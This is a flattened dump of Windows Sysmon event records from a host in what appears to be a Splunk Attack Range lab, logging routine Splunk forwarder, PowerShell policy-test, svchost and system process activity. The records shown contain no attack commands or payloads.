10341000x80000000000000009941Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.156{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-65AF-6064-5401-00000000AE01}5500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009940Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.156{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65AF-6064-5401-00000000AE01}5500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009939Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.157{266CAFBE-65AF-6064-5401-00000000AE01}5500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000009961Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:08.703{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_m5ah5s10.3mx.ps12021-03-31 12:06:08.703 23542300x80000000000000009960Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:08.671{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89FAB2EE6B4EA00B740527FA0B55FDA5,SHA256=F300B5A888F95904EA08865F04585EC0B3B9063833528D4CFFB8B11E989211C0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009959Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:08.609{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000009958Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:06.540{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53652-false10.0.1.12-8000- 10341000x80000000000000009957Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:08.093{266CAFBE-65AF-6064-5501-00000000AE01}66086876C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000009983Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:06:09.812{266CAFBE-65AB-6064-5001-00000000AE01}2456\PSHost.132616659639808539.2456.DefaultAppDomain.powershellC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000009982Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.765{266CAFBE-65AB-6064-5001-00000000AE01}2456ATTACKRANGE\AdministratorC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_3fsdzld1.lr2.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009981Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.765{266CAFBE-65AB-6064-5001-00000000AE01}2456ATTACKRANGE\AdministratorC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_m5ah5s10.3mx.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009980Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.687{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7AE99815B1104DEA440A806BB012F5B,SHA256=FF6D51CD97B66B97A8057A2A8187C14C98684BDE7320EB2C747921B1C1AA61A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009979Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.655{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D35DFD6735964D8C7C64CB1F96255CBA,SHA256=CD9EDF7431E2ADC1ABAA4270374627C54A88CD384CF5E1188F6EC95D96149451,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009978Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.593{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65B1-6064-5601-00000000AE01}3224C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009977Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:09.593{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009976Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.593{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009975Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:09.593{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009974Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.593{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009973Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.593{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-65B1-6064-5601-00000000AE01}3224C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009972Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.593{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65B1-6064-5601-00000000AE01}3224C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009971Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.453{266CAFBE-65B1-6064-5601-00000000AE01}3224C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009970Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.468{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000009969Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:09.468{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000009968Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:09.468{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000009967Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:09.468{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000009966Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:09.468{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000009965Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:09.468{266CAFBE-64C4-6064-9C00-00000000AE01}46201988C:\Windows\system32\sihost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009964Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.296{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32
\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000009963Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 